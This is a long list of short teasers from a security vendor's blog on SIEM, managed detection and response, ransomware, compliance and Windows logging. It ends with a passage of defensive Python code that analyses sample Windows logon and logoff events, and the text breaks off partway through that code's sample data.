Preparing the Infrastructure. From all the uses for log data across the spectrum of security, compliance, and operations, using logs for incident response presents a truly universal scenario – you can be forced to use logs for incident response at any moment, whether you’re prepared or not.
Are You Listening to Your Endpoints?

There’s plenty of interest in all kinds of advanced security technologies like threat intelligence, strong/dynamic authentication, data loss prevention and information rights management. However, so many organizations still don’t know that the basic indicators of compromise on their network are new processes and modified executables.
Research points to SIEM-as-a-Service

SC Magazine released the results of a research survey focused on the rising acceptance of SIEM-as-a-Service for the small and medium sized enterprise. The survey found that SMEs and companies with $1 billion or more in revenue or 5,000-plus employees faced similar challenges.

Six Proactive Steps to Expand Attack Surface Coverage

Organizations use 40+ products and IT tools on average to manage networks, SaaS applications, and endpoints. This fragmented approach creates data siloes and blind spots that hamper detection and incident response. Attackers actively look for easy targets like misconfigured websites and unpatched applications to exploit. Service Providers can leverage their strong business relationships and trusted advisor roles to help businesses protect their expanding attack surface and be more proactive regarding malware and breaches.
Key Elements of MDR for Powerful and Practical Cybersecurity

The rise in ransomware attack volume and sophistication is a wake-up call for executives and IT departments alike. Traditional perimeter-focused defenses, such as firewalls, are no longer sufficient against stealthy and financially-motivated attackers.
Three Indicators of Attack

For many years now, the security industry has become somewhat reliant on ‘indicators of compromise’ (IoC) to act as clues that an organization has been breached. Every year, companies invest heavily in digital forensic tools to identify the perpetrators and which parts of the network were compromised in the aftermath of an attack.

The Cost of False IT Security Alarms

Think about the burglar alarm systems that are common in residential neighborhoods. In the eye of the passive observer, an alarm system makes a lot of sense. They watch your home while you’re asleep or away, and call the police or fire department if anything happens. So for a small monthly fee you feel secure. Unfortunately, there are a few things that the alarm companies don’t tell you.
The Assume Breach Paradigm

Given today’s threat landscape, let’s acknowledge that a breach has either already occurred within our network or that it’s only a matter of time until it will. Security prevention strategies and technologies cannot guarantee safety from every attack. It is more likely that an organization has already been compromised, but just hasn’t discovered it yet. Operating with this assumption reshapes detection and response strategies in a way that pushes the limits of any organization’s infrastructure, people, processes and technologies.
Diagnosing Account Lockout in Active Directory

Here we are going to look for Event ID 4740. This is the security event that is logged whenever an account gets locked. When “User X” is getting locked out, Security Event ID 4740 is logged on the respective servers with detailed information.
Do you know where your data is?

In this fifth article of the series, we continue to explore the basic ways businesses can keep their networks safer. These include tools you can implement on your own and understand why taking action is vital to the safety of your business.
Ransomware-as-a-Service is Skyrocketing

No matter what business you are in, it’s likely you view ransomware as one of the top cyber threats today. Adversaries are adapting and morphing their harmful techniques to better evade detection and infect a wider set of targets. As a result, ransomware has skyrocketed in the past two years, according to Cofense.
Big Data or Smart Questions for Effective Threat Hunting

Advances in data analytics and increased connectivity have merged to create a powerful platform for change. Today, people, objects, and connections are producing data at unprecedented rates. According to DOMO, 90% of all data today was created in the last two years, with a whopping 2.5 quintillion bytes of data being produced per day.

AI-powered Ransomware: AI is Now a Critical Piece of Today’s Security Puzzle

As ransomware groups enhance their capabilities with generative AI and sophisticated automation, security leaders need to extend their detection and response capabilities more than ever. 
What Is Managed Detection Response (MDR)? A Comprehensive Guide

As the importance of protecting valuable data and systems increases, organizations are facing mounting challenges in defending against sophisticated cyber attacks. To address these threats head-on, businesses are increasingly adopting advanced security solutions such as Managed Detection Response (MDR). In this comprehensive guide, we will explore the key components of MDR, highlighting its core elements, […]
True Cost of Data Breaches

The Cisco Annual Cybersecurity Report provides insights based on threat intelligence gathered by Cisco's security experts, combined with input from nearly 3,000 Chief Security Officers (CSOs), and other security operations leaders from businesses in 13 countries.
Think Like a Hacker with MITRE ATT&CK

The threat landscape continues to accelerate, with sophisticated attacks becoming more commonplace as ransomware-as-a-service accelerates and legacy security tools fail to keep up. Financially motivated cyber criminals are explicitly targeting small and medium-sized businesses to steal sensitive data.
Securing Zoom Conferencing to Protect Data

Business uncertainty has led to widespread adoption of working from home. Since most meaningful tasks in any organization require teamwork, this remote work approach has naturally led to a dramatic rise in the use of collaboration tools such as Zoom Conferencing.
Hungry...Hungry...HIPAA

I have fond memories of playing a board game called Hungry Hungry Hippos in my younger days. Today’s medical practices mirror the chaos of the game. Each day seems more hectic than the previous...
The True Cost of Setting Up and Operating a 24x7 Security Operations Center (SOC)

Understanding the costs behind setting up and running a Security Operations Center is important to making informed decisions about how much protection you can afford and how you will go about acquiring it. The simple answer to the question “How much does a SOC cost?” is that it depends on many variables. In this article we will break down those variables and provide typical costs that you can use to inform your decision making about how to best protect your organization.
MDR Cybersecurity: Strengthening Defenses Against Modern Threats

In our interconnected world, the specter of cyber attacks casts a formidable shadow. With each technological advancement, cybercriminals adapt their tactics and strategies, posing new challenges for organizations. To effectively counter these ever-evolving threats, robust cybersecurity measures are essential. Among these measures, Managed Detection and Response (MDR) has emerged as a pivotal component in fortifying […]
Three critical advantages of EventTracker Essentials

By now it’s accepted that SIEM is a foundational technology for both securing a network from threats as well as demonstrating regulatory compliance. However, SIEM is not fit-and-forget technology, nor is it technically simple to implement and operate.
The Ten Steps Post Data Breach

Nearly 60% of businesses have experienced a breach in the last two years. Have you ever considered what would happen if your business was breached? Do you have a plan of action?
Why are Workstation Security Logs so Important?

No one needs to be convinced that monitoring Domain Controller security logs is important; member servers are equally as important: most people understand that member servers are where “our data” is located.
Is a Business Really Protected or is it Home Alone: Prevent, Detect, and Respond for True Security

Protecting a business’ IT infrastructure and data can be difficult with the abundance of threats out there, the array of new data privacy regulations, and many cybersecurity solutions to choose from. Even today, far too many businesses still claim protection with just anti-virus and firewall, when these measures aren’t enough to keep up with advanced threats.
Managed Detection Response Solutions: Enhancing Cybersecurity Defense

In today’s rapidly evolving digital landscape, organizations face an ever-growing threat of cyber-attacks. The traditional reactive approach to cybersecurity is no longer sufficient to protect sensitive data and critical systems. Managed Detection Response (MDR) solutions have emerged as a proactive and effective approach to enhance cybersecurity defense. In this blog, we will explore the core components, […]
Cost-Effective Log Management: What Log Data Does Your SIEM Need?

Optimize your SIEM implementation by avoiding redundant analysis and focusing on the highest-value log data first.  Deciding which logs to analyze is an important step in the process of SIEM implementation. Every organization must answer this question based on its own network infrastructure, security posture, and risk profile. 
Challenges with Threat Intelligence or why a Honeynet is a good idea

Shared threat intelligence is an attractive concept. The good guys share experiences about what the bad guys are doing, thereby blunting attacks. This includes public-private partnerships like InfraGard, a partnership between the FBI and the private sector dedicated to sharing information and intelligence to prevent hostile acts against the U.S.
SIEM: Security, Incident AND Event MANAGEMENT, not Monitoring!

Unfortunately, IT is not perfect; nothing in our world can be. Compounding the inevitable failures and weaknesses in any system designed by fallible beings are those with malicious or larcenous intent who search for exploitable system weaknesses.
The Evolution of Managed Detection Response: A Comprehensive History 

Introduction to Managed Detection Response (MDR):  Managed Detection Response (MDR) has emerged as a crucial component in the field of cybersecurity, providing organizations with enhanced threat detection and response capabilities. In this blog, we will delve into the history of MDR, exploring its origins, advancements, and its current role in the modern cybersecurity landscape.  Early […]
How to Detect and Mitigate Compromised Credential Attacks

Most security technologies are ineffective against unauthorized users with stolen credentials.  Cybersecurity vendors spend a great deal of time and money warning against technical exploits and ransomware attacks. These are undoubtedly serious threats, but they are not nearly as complex or dangerous as compromised credential attacks.  In fact, although ransomware dominates headlines in the cybersecurity […]
Secure, Usable, Cheap: Pick any two

This fundamental tradeoff between security, usability, and cost is critical. Yes, it is possible to have both security and usability, but at a cost in terms of money, time and personnel. Making something both cost-efficient and usable, or even secure and cost-efficient, may not be very hard; making something both secure and usable is far more difficult and time consuming. It takes a lot of effort and thinking, because security takes planning and resources.

Three Causes of Incident Response Failure

Breaches continue to be reported at a dizzying pace. In 2018 alone, a diverse range of companies — including Best Buy, Delta, Orbitz, Panera, Saks Fifth Avenue, and Sears — were victimized. These are not small companies, nor did they have small IT budgets. So, what’s the problem?
Managed Detection Response Celebration: Join Our Exciting Journey!

We're thrilled to announce our momentous milestone as we start our journey of 15 years in the managed detection response field. Reflecting on our achievements, we express our appreciation for our outstanding team and valued industry partners. To honor this occasion, we're introducing Lumifi Day, a special celebration dedicated to our team members. Lumifi Day […]
Security Subsistence Syndrome

Security Subsistence Syndrome (SSS) is defined as a mindset in an organization that believes it has no security choices and is underfunded, so it minimally spends to meet perceived statutory and regulatory requirements.

Ten Work-from-Home Cybersecurity and Productivity Tips

More Work-from-Home (WFH) scenarios due to COVID-19 present challenges as employees move from a trusted and secured office network to home networks with widely varying technology and cybersecurity rigor. Here are some tips to stay safe as you and your employees work remotely.
An interview with Michael Malone: The evolution of MDR

Q. Can you share with us the journey of Datashield/Lumifi and how it has evolved in the field of Managed Detection and Response (MDR)? What were the key milestones and challenges along the way?  Datashield/Lumifi has come a long way in Managed Detection and Response (MDR). Our journey began as an investment by myself and […]
How to Protect Financial Data: 4 Cyber Risks MSPs Can't Ignore

Banks have always been a prime target for cybercriminals. With enormous stores of cash and consumer data, and the massive threat of financial losses, regulatory consequences, and reputational damage, there’s really no choice for financial institutions but to innovate and accelerate their cybersecurity strategies.
Malicious Insiders in Healthcare: The Moment UEBA was Made For

With UEBA-powered platforms like Exabeam, you can catch threat actors who already work within your network.  External threats aren't the only kind of threat security leaders need to prepare for. Insider threats often pose an even greater risk. 
How to Leverage UEBA to Address Your Organization's Unique Risk Profile

You can make UEBA technology work right out of the box – but custom configuration is needed to unlock its real value.   User Entity and Behavioral Analytics (UEBA) technology is a game-changing addition to any security tech stack. UEBA-enhanced insights allow security teams to detect sophisticated attacks that other technologies often miss.  Compromised credentials and […]
What You Should Know About PCI DSS 4

Discover PCI DSS v4.0, the latest global standard for securing payment card data. Released March 31, 2022, it enhances security against evolving threats.
Why Aren't Security Experts Talking About Public Administration?

Government agencies are quietly suffering a significant uptick in security incidents and data breaches – but the cybersecurity industry doesn't seem to have noticed yet. One insight stands out among the many contained in Verizon's 2023 Data Breach Investigations Report.
Top 5 Takeaways from Verizon's 2023 Data Breach Report

Cybercriminals are adopting new, more sophisticated tactics. Security leaders can't depend on purely technical solutions that ignore the human element.  If there is one broad theme to Verizon's 2023 Data Breach Report, it's that the arms race between cybercriminals and cybersecurity professionals hinges on the human element more than ever. The report declares this clearly […]
PCI DSS 4 Requirements: What It Means for You

Are you compliant with PCI DSS Version 4? Restaurants, retailers, hotels, doctors' and lawyers' offices, and many more, all need to watch for PCI DSS updates to remain compliant.
The Ultimate Playbook to Become an MSSP

Now that advanced cybersecurity protections are a must-have in today’s landscape, organizations of all sizes are increasingly seeking out and leaning on a trusted security partner to manage their security services. A recent study released by Forrester revealed that 57 percent of companies are seeking outside help for IT systems monitoring and 45 percent are outsourcing threat detection and intelligence.

RSA Conference Key Takeaways for Cybersecurity Defenders

RSA Conference 2020 has come and gone. It still maintains its status as the largest security event in the world, although attendance dipped from last year due to virus jitters and travel restrictions. While the mood at RSA Conference (RSAC) overall was a bit more subdued than in the past, attendee engagement with the Netsurion team to discuss co-managed SIEM in the expo hall was at an all-time high.
Use Automation to Enhance the Value of Human Expertise in the SOC

Automation isn't always a replacement for human expertise. The two must work together to generate lasting security value.  Security Operations Centers have struggled with workforce shortages for years. Experts were already alarmed at the growing cybersecurity talent gap back in 2017.  
What you should know about programs, ports and services

In this fourth article in the series, we continue to explore some of the basic ways that businesses of all sizes can keep their computer systems safer. We will discuss the topic of programs, ports and services.
Ransomware's Next Move

While IT security teams identify, hunt, and remove specific variants of the ransomware, there may already be unknown mutated varieties lurking dormant and ready to execute.
How To Defend Against Threat Group Attacks

It’s no secret that cybersecurity threats are rising for organizations of all sizes and industries.  U.S. cybersecurity authorities like the CISA, NSA, and the FBI are aware of recent reports of increased malicious cyber activity and expect this trend to continue. Organizations face security gaps and weaknesses from a patchwork of IT products and tools with little visibility and a false sense of security.
Compromised Credential Attacks Are Top Cause of Data Breaches

The use of stolen or compromised credentials remains the most common cause of a data breach. It was responsible for 19% of breaches studied by IBM in 2022. The reason? These attacks are relatively easy to plan and execute.
Protect Your Security Budget Against Economic Risks with MDR

Security leaders are increasingly being asked to do more with less. In-house capabilities don't scale fast enough to keep up.  Business leaders are cutting costs across the board in preparation for a potential recession. Business units that were used to receiving ample funding are hitting limits to near-term growth. Organizations that used to fund ambitious […]
Uncover C&C traffic to nip malware

In a recent webinar, we demonstrated techniques by which EventTracker monitors DNS logs to uncover attempts by malware to communicate with Command and Control (C&C) servers. Modern malware uses DNS to resolve algorithm generated domain names to find and communicate with C&C servers.
Catch Malware Hiding in WMI with Sysmon

Security is an ever-escalating arms race. The good guys have gotten better about monitoring the file system for artifacts of advanced threat actors.
The Perils of Using Remote Access Software

While software that can be installed on your PC and used to remotely connect when you are away from your home office can be very handy, it also comes with risks that may not be apparent at first.
The Bite Behind the Bark: Enforcement Power of GDPR

There’s an old saying: Their bark is worse than their bite. However, this is not the case with the penalties of non-compliance when it comes to the General Data Protection Regulation (GDPR). With the enforcement date of the GDPR having passed on May 25, 2018, any company not in compliance could be in for a very nasty shock.
Security Signals Everywhere: Finding the Real Crisis in a World of Noise

Imagine dealing with a silent, but mentally grating barrage of security alerts every day. The security analyst’s dilemma?
Renew Focus on Web Application Security

Today’s always-on digital businesses and service providers rely on web applications and APIs to fuel growth, run eCommerce sites and customer portals, and engage 24/7 with customers. Cyber criminals are also targeting these public-facing assets for monetary gain or to make a political statement. In fact, 43% of data breaches have been tied to web application vulnerabilities, highlighting the importance of understanding and protecting these business-critical assets. Managed Service Providers (MSPs) must also make protecting web applications a key priority.
SIEMpocalypse?

Did you know that Microsoft is a security vendor? No, it’s true. For years, the company was hammered by negative public perception and the butt of jokes around the 2002 "trustworthy computing" memo. The company has steadily invested in developing a security mindset and the product results are now more visible to the public.
Looking back: Operation Buckshot Yankee & agent.btz

It was the fall of 2008. A variant of a three-year-old, relatively benign worm began infecting U.S. military networks via thumb drives.
What is EDR and Why It is Critical to SMB Security?

Over 7 billion global devices in an always-on, continuously connected world create a soft target for today’s attacker. Whether working to monetize data or make a political statement, adversaries are well funded and staffed in the battle for endpoint access and control.
Tracking Physical Presence with the Windows Security Log

How do you figure out when someone was actually logged onto their PC? The data is there in the security log, but it’s so much harder than you’d think.
Universal Plug and Play - New Report on an Old Problem

In the dark ages of personal computers (the 1980s and 90s), you either needed to be a computer geek or have access to one if you wanted any device to work with your computer. You had to go through a complicated driver installation process, and possibly replace system files. My, how the world has changed.
The Impact Of A Data Breach

What is the true cost of a data breach? A data breach affects your business, brand, and reputation. But it can be prevented.
Threat Hunting: Five Myths for MSPs to Overcome

Threat hunting is gaining traction as businesses look for more proactive methods to combat multi-stage ransomware attacks and devious “low and slow” hackers. Threat hunting complements threat detection and response to provide a more comprehensive and layered approach. Many managed service providers (MSPs) actively seek ways to become proactive and offer guided remediation that actively stops and blocks threats. The lack of staff and skills, along with unfamiliarity with threat hunting processes and techniques, can all inhibit adoption.
Six Simple Rules For Safe Credit Card Handling

It is becoming more and more frequent to read about electronic data breaches in the news these days. Unfortunately, what is not touched on as frequently are the physical security issues present in restaurant and retail establishments.
PCI 3.0 Is Coming - Are You Ready?

Every 3 years the Payment Card Industry Data Security Standard (PCI DSS) is updated to a new version. The time for the next release is right around the corner. Are you ready?
Logs vs Bots and Malware Today

Despite the fact that the security industry has been fighting malicious software – viruses, worms, spyware, bots and other malware – since the late 1980s, malware still represents one of the key threat factors for organizations today. While the silly viruses of the 1990s and noisy worms (Blaster, Slammer, etc.) of the early 2000s have been replaced by commercial bots and so-called “advanced persistent threats,” the malware fight rages on.
Idea to retire: Do more with less

Ideas to Retire is a TechTank series of blog posts that identify outdated practices in public sector IT management and suggest new ideas for improved outcomes. Dr. John Leslie King is W.W. Bishop Professor in the School of Information at the University of Michigan.
User Location Affinity

It’s clear that we are now working under the assumption of a breach. The challenge is to find the attacker before they cause damage. Once attackers gain a beachhead within the organization, they pivot to other systems. The Verizon DBIR shows that compromised credentials make up a whopping 76% of all network incursions.
Threat Intelligence and The Pyramid of Pain

There is great interest among security technology and service providers about the intersection of global threat intelligence with local observations in the network. While there is certainly cause for excitement, it’s worth pausing to ask the question “Is Threat Intelligence being used effectively?”

Netsurion services and the OpenSSL Heartbleed issue

Many of our customers and resellers have asked how Heartbleed affected Netsurion services. In a nutshell, the managed services that make up our product offerings were not directly affected by Heartbleed.
Key takeaways from the presidential debate on cybersecurity.

The presidential debate, as entertaining as it was for many, was a great place to hear about the focus needed on cybersecurity issues in this country. Both candidates were asked the following question on the topic of cybersecurity in the U.S...
Can your Cybersecurity Posture be Called "Reactive Chaos"?

Does this sound familiar? You have no control of your environment and most of your efforts are diverted into understanding what happened, containing the damage, and remediating the issue.
Square Cash - A Money Transfer Game Changer?

Square strives to make financial transactions simple enough that the average person on the street can participate. Before Square, a regular person without a bank-supplied merchant account could not take credit cards. Today, Square allows everyone with a smartphone to accept credit cards, and now the company is focusing on another market – person-to-person cash payments.
How to Combat the Rising Costs of Cybersecurity Insurance

Even though your business may have cybersecurity insurance, it doesn’t mean you can avoid the steps necessary to prevent bad things from happening. Similar to our own healthcare, it’s no secret that being diligent with preventative care and a consistent healthy lifestyle not only protects your health but also protects your pocketbook from more serious illness, no matter what kind of insurance you have. 
Backoff Is the New Standard by Which Other Malware Will Be Judged

Every now and then hackers develop a piece of malware that is so insidious that it changes the landscape of computer security and acceptable practices. While there are many contenders for this dubious list, CodeRed, Zeus, and now Backoff are certainly worthy of inclusion.
Five Takeaways from the 2019 SIEM Study

We recently released the findings of the Security Information and Event Management (SIEM) study conducted by Cybersecurity Insights. The study surveyed over 345 IT and Security executives and practitioners, with 45% of them small and mid-sized firms with 999 or fewer employees and the balance comprised of enterprise organizations with 1,000 or more employees.
The Transition to EMV Isn't Over

Merchants know by now that after October 1st the liability for card-present fraud will shift to whichever party is the least EMV-compliant in a fraudulent transaction. This means that merchants will be more accountable if EMV is not implemented.
Consolidation: The Cure for Cybersecurity Vendor Sprawl

There are three cybersecurity “givens” that small-to-medium-sized businesses (SMBs) often face. One is you are not too small to be targeted by cyber criminals. Even big ransomware gangs are refocusing their efforts on mid-sized victims to avoid scrutiny. A second is that your attack surface is expanding – particularly with the move to cloud, Software-as-a-Service (SaaS) adoption, and Work-From-Home (WFH) – while threat actors continue to evolve new, more sophisticated approaches.
Cybersecurity Trends and Predictions 2019

The year 2018 saw ransomware families such as CryptoLocker and variants like Locky continue to plague organizations as cybersecurity adversaries morph their techniques to avoid detection. Several massive data breaches this year, including Quora, Ticketmaster, and Facebook, exposed over 200 million records worldwide. As the year winds down, here’s what small and mid-sized organizations may experience in 2019, with an eye towards enhancing security.
Are honeypots illegal?

In computer terminology, a honeypot is a computer system set up to detect, deflect, or in some manner counteract attempts at unauthorized use of IT systems. Generally, a honeypot appears to be part of a network, but is actually isolated and monitored, and seems to contain information or a resource of value to attackers.
Is the ELK Stack a SIEM?

The ELK (Elasticsearch, Logstash, Kibana) stack is a popular open source log analysis and management platform. The collection, processing, normalization, enhancement, and storage of log data from various sources are grouped under the term “log management.”
Cybercrime Doesn't Take a Holiday

The holidays are a busy time for most business owners as they ramp up to serve consumers excited to find holiday specials, or even as they prepare for time away from their businesses to spend time with friends and family. Hackers know that you are distracted from your core duties and normal routine and will look for vulnerabilities in your systems.
Top three reasons SIEM solutions fail

We have been implementing Security Information and Event Management (SIEM) solutions for more than 10 years. We serve hundreds of active SIEM users and implementations. We have had many awesome, celebratory, cork-popping successes. Unfortunately, we’ve also had our share of sad, tearful, profanity-filled failures.
Cloud and SaaS Security: Mind the Gap

Software-as-a-Service (SaaS) applications and infrastructure providers like Amazon Web Services (AWS) and Microsoft Azure have become the norm for organizations large and small. Enhancing cloud security maturity is even more critical given the proliferation of cloud workloads and a chronic shortage of cloud expertise.
Protecting Managed Service Providers from Cyber Attacks

As a Managed Service Provider (MSP) offering IT infrastructure and end-user systems, your clients entrust you with their valuable assets, sensitive data, and intellectual property. What security best practices can MSPs utilize to avoid becoming a headline?
Subtraction, Multiplication, Division and Task Unification through SIEM and Log Management

When we originally conceived the idea of a SIEM and log management solution for IT managers many years ago, it was because of the problems they faced dealing with high volumes of cryptic audit logs from multiple sources. Searching, categorizing and analyzing, and performing forensics and remediation for system security and operational challenges evidenced in disparate audit logs were time consuming, tedious, inconsistent and unrewarding tasks. We wanted to provide technology that would make problem detection, understanding, and therefore remediation, faster and easier.

The EPS Myth

Often when I engage with a prospect their first question is “How many events per second (EPS) can EventTracker handle?” People tend to confuse EPS with scalability so by simply giving back an enormous-enough number (usually larger than the previous vendor they spoke with) it convinces them your product is, indeed, scalable.
Master the Art of Selling Managed Security Services as an MSP

When it comes to selling security, one of the major challenges faced by managed services providers (MSPs) is changing the mindset of small- and medium-sized business (SMB) owners. With massive breaches hogging news headlines today, security is hard to ignore.
Five Myths About Ransomware

Ransomware is a popular weapon for cyber criminals. Worldwide in 2020, there were 304 million ransomware attacks, a 62% increase from the year prior, according to Statista. All verticals are vulnerable to these ransomware attacks, which if successful, are a blot on financial statements of the targeted organizations.
Building Trust: Four Tips for MSSPs

Customers look to Managed Security Service Providers (MSSPs) as trusted advisors in achieving digital transformation and navigating ever-evolving data security and privacy regulations. In times of uncertainty, it’s critical to over-deliver and boost your security posture.
Pain-Free Data Security for Medical Offices

It’s understandable that the primary goal of any healthcare practice is to keep their patients healthy and safe. But what about keeping their patients’ data safe too?
For of all sad words of tongue or pen, the saddest are these: 'We weren't logging'

It doesn't rhyme and it's not what Whittier said but it's true. If you don't log it when it happens, the evidence is gone forever.
Four CompTIA ChannelCon Takeaways for MSPs to Boost Cybersecurity

It was great to be back in Chicago for ChannelCon 2022. Thank you to CompTIA for their successful event, with 1,000 attendees and vendor partners for the extensive formal and informal learning opportunities enabling us to recommend and reinvigorate after the last 24 months.
Once More Unto the Data (Breach), Dear Friends

As I reflect on this year, a Shakespearean quote plays out in my mind – when King Henry the Fifth is rallying his troops to attack a breach, or gap, in the wall of a city, “Once more unto the breach, dear friends”...
Use MITRE ATT&CK to Thwart Ransomware Faster

Ransomware has made a resurgence and is impacting both IT service providers and the businesses they serve. What if you had insights into cyber criminal tactics and techniques happening in your environment? What if you knew more about the adversaries you face in this cyber battle? Can you help prioritize potential threats to stop a ransomware attack before it’s too late? The MITRE ATT&CK framework enables defenders to optimize protection beyond legacy tools like anti-virus.
Cybersecurity Professionals

As data breaches occur more and more, it is no secret that the market needs more cybersecurity professionals. Here are a few statistics on the need to educate the next generation on pursuing cyber professional careers.
Death by a Thousand cuts

You may recall that back in 2012, then Secretary of Defense Leon Panetta warned of “a cyber Pearl Harbor; an attack that would cause physical destruction and the loss of life.” This hasn’t quite come to pass has it? Is it dumb luck? Or are we just waiting for it to happen?
Hackers May Just Look to Embarrass You

When you think about electronic security, what comes to mind? Do you consider how vulnerable your customer credit cards are, or how easily someone can break into your online bank account? These are the most profitable avenues of attack that thieves usually focus on, but occasionally, cybercriminals are motivated by something besides greed.
Does Your Call for Help Bring Hackers to Your Door?

There is a new trend facing people who rely on help desks. Hackers are targeting help desks because they know that the people who provide you support have the access into your systems that they want to exploit.
Enriching Event Log Monitoring by Correlating Non Event Security Information

Sometimes we get hung up on event monitoring and forget about the “I” in SIEM, which stands for information. Not forgetting information is important because there are many sources of non-event security information that your SIEM should be ingesting and correlating with security events, more than ever before. There are at least four categories of security information that you can leverage in your SIEM to provide better analysis of security events.
Coordinated Ransomware Attacks Hit Resource-Constrained Municipalities

A financially motivated ransomware gang hit 23 local governments in Texas in a coordinated attack. Ransomware is a type of malicious software, often delivered via email or drive-by web downloads, that locks up an organization’s systems until a ransom is paid or files are recovered by other means such as backup restoration.
Top 5 Linux log file groups in /var/log

If you manage any Linux machines, it is essential that you know where the log files are located, and what is contained in them. From a security perspective, here are 5 groups of files which are essential. Many other files are generated and will be important for system administration and troubleshooting.
The Detection Deficit

The gap between the ‘time to compromise’ and the ‘time to discover’ is the detection deficit. According to the Verizon DBIR, the trend lines of these have been diverging significantly in the past few years. Worse yet, the data shows that attackers are able to compromise the victim in days but thereafter are able to spend an average of 243 days undetected within the enterprise network before they are exposed.
Front-Line MSSPs Share 2021 Cybersecurity Predictions

In 2020, we saw digital transformation accelerate along with rising ransomware, threats caused by human error and misconfigurations, and challenges in IT staff retention. While there is no crystal ball, cybersecurity experts share how organizations can optimize finite resources and prioritize security measures.  
 
Expanding Work-from-Home Increases Cybersecurity Risk

Maintaining strong cybersecurity is crucial as organizations make impromptu decisions to send more and more employees to work from home to help minimize the spread and impact of COVID-19. Before you expand and extend your remote workforce, it’s critical that you take appropriate steps to ensure that by decreasing a health risk to your business, those same actions don’t conversely increase a cybersecurity risk.

When a SIEM is Like an Exercise Machine Stuck Behind the Junk in Your Garage

I’m a big believer in security analytics and detective controls in general.  At least sometimes, bad guys are going to evade your preventive controls, and you need the critical defense-in-depth layers that detective controls provide through monitoring logs and all the other information a modern SIEM consumes.

How SOC-as-a-Service Enhances Security Operations

Faced with rising cybersecurity concerns, MSPs and mid-sized organizations are maturing their security posture beyond a network operations center and help desk. But few have realized a centralized security operations center (SOC) with a formal charter and full-time staff.

Safeguard Your Business Against Ransomware Threats

As the second iteration of the WannaCry ransomware impacting IT infrastructure around the globe is expected, we want to arm our customers with information to be best prepared.

Make a cybersecurity list and check it twice this holiday season

As the holidays swiftly approach, many of us are making lists and plans as part of the crescendo of year-end activity. We don’t want to forget anything important, but is ensuring safety from cybercrime at the top of your list?

What is privilege escalation and why should you care?

A common hacking method is to steal information by first gaining lower-level access to your network. This can happen in a variety of ways: through a print server, via a phished email, or taking advantage of a remote control program with poor security.

How to control and detect users logging onto unauthorized computers

Windows gives you several ways to control which computers can be logged onto with a given account.  Leveraging these features is a critical way to defend against persistent attackers.

How to Justify EDR with Three Top Business Cases

Increasing complexity and frequency of attacks have escalated the need for detection of attacks and incident response. Endpoints are the new battleground as they are a) more pervasive across the network, b) more commonly used by non-IT personnel, and c) less well-defended by IT teams who first move to secure the data center. Endpoint detection and response (EDR) solutions meet the need to rapidly investigate large numbers of systems for evidence of malicious activity, quickly uncover, and then remediate attacks and incidents.

How to Overcome Three Major Cybersecurity Budget Hurdles

Success starts with a well-planned strategic budget. Face the fear…now’s the time to plan for powerful yet practical cybersecurity.

Best Practices to Halt Insider Threats

While nation-state threat actors and external hackers often garner the headlines, insider threats are an often-overlooked threat vector. Rockwell-Boeing, Anthem Healthcare, and Capital One are just a few organizations with damaging data breaches caused by insiders.

Target Has A Bullseye On Its Chest

When Target announced that it had suffered a major breach of approximately 40 million credit cards and 70 million customer records, the nation as a whole took a collective gasp in shock. In the aftermath of the initial disclosure, the public then heard from Neiman Marcus that it too had suffered an electronic breach of data that may include credit cards.

EDR vs XDR – Which is the Best Solution for Your Business?

Both technologies provide endpoint protection, but with different levels of sophistication.   For years, endpoint detection and response (EDR) has formed the backbone of many enterprise cybersecurity solutions. EDR technology enables greater visibility into systems, allowing security professionals to detect threats from file-less attacks, document-based malware, and zero-day exploits. 

Today’s CISO Challenges - The Talent Gap

It continues to be challenging being a Chief Information Security Officer (CISO) today – and this year promises no rest. As high-profile data breaches escalate, CISOs, CIOs, and other information security professionals believe their organizations are more likely than ever to fall victim to a data breach or cyber attack.

Do you have a cyber blind spot?

What's the cost of securing your network from a cyber attack? According to Precision Analytics and The CAP Group, many companies are now spending less than 0.2 percent of their revenue on cybersecurity, at least one-third less than financial institutions. If that's you then you may have a cyber blind spot.

Host-based Versus Network-based Security

The argument is an old one; are you better off with a network-based detector, assuming all hosts will eventually communicate, or should you look at each host to determine what they are up to?

Avoid Log Monitoring Gaps with Holistic Coverage

A data breach today takes 127 days to detect, according to the Ponemon Institute. Comprehensive visibility and real-time analysis of device and application log data provide an early warning of cybersecurity threats before damage occurs. Log monitoring and Security Information and Event Management (SIEM) decision makers sometimes make short-sighted financial decisions to reduce log sources, only to find that it impacts security decision making and incident response.

Compliance is not a proxy for due care

Regulatory compliance is a necessary step for IT leaders, but it is not sufficient to reduce residual IT security risk to tolerable levels. This is not news. But why is this the case? Here are three reasons:

Top 4 Security Questions You Can Only Answer with Workstation Logon/Logoff Events

I often encounter a dangerous misconception about the Windows Security Log: the idea that you only need to monitor domain controller logs.  Domain controller security logs are absolutely critical to security but they are only a portion of your overall audit trail.  Member server and workstation logs are really just as important and I’m going to focus this article on the top 4 questions you can only answer with workstation logon/logoff events.
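The questions above, and the earlier post on controlling and detecting accounts that log on to computers they should not, can be answered with a few lines over the workstation events themselves. The following is an added example, not code from either post: it runs over constructed 4624/4634/4647 records, the per-account computer allow-list is this script's assumption (it stands in for the "Log On To" restriction an admin can set on an AD account, but here it is only used for detection), and logons are paired with logoffs on (Computer, Logon ID) because a Logon ID is only unique per machine.

```python
"""Four workstation-level questions answered from Windows logon/logoff events.

Added example, not code from the original posts.  The records below are
constructed to look like the fields a SIEM extracts from Security log events
4624 (successful logon), 4634 (logoff) and 4647 (user-initiated logoff).
The per-account allow-list is an assumption of this script.
"""
from collections import defaultdict
from datetime import datetime

# Logon types that mean someone is at the keyboard (or in an RDP session).
INTERACTIVE = {2, 10, 11}   # 2 = console, 10 = RemoteInteractive (RDP), 11 = cached console

# Constructed sample events (UTC timestamps); not real log data.
EVENTS = [
    {"ts": "2024-03-04T08:01:00", "EventID": 4624, "LogonType": 2, "LogonId": "0x3e7a1",
     "User": "alice", "Computer": "WS-ALICE", "Ip": "-"},
    {"ts": "2024-03-04T12:10:00", "EventID": 4624, "LogonType": 10, "LogonId": "0x51c02",
     "User": "alice", "Computer": "FIN-SRV01", "Ip": "10.1.5.23"},
    {"ts": "2024-03-04T12:40:00", "EventID": 4634, "LogonType": 10, "LogonId": "0x51c02",
     "User": "alice", "Computer": "FIN-SRV01", "Ip": "-"},
    {"ts": "2024-03-04T17:05:00", "EventID": 4647, "LogonType": 2, "LogonId": "0x3e7a1",
     "User": "alice", "Computer": "WS-ALICE", "Ip": "-"},
    {"ts": "2024-03-04T22:30:00", "EventID": 4624, "LogonType": 3, "LogonId": "0x7a9b3",
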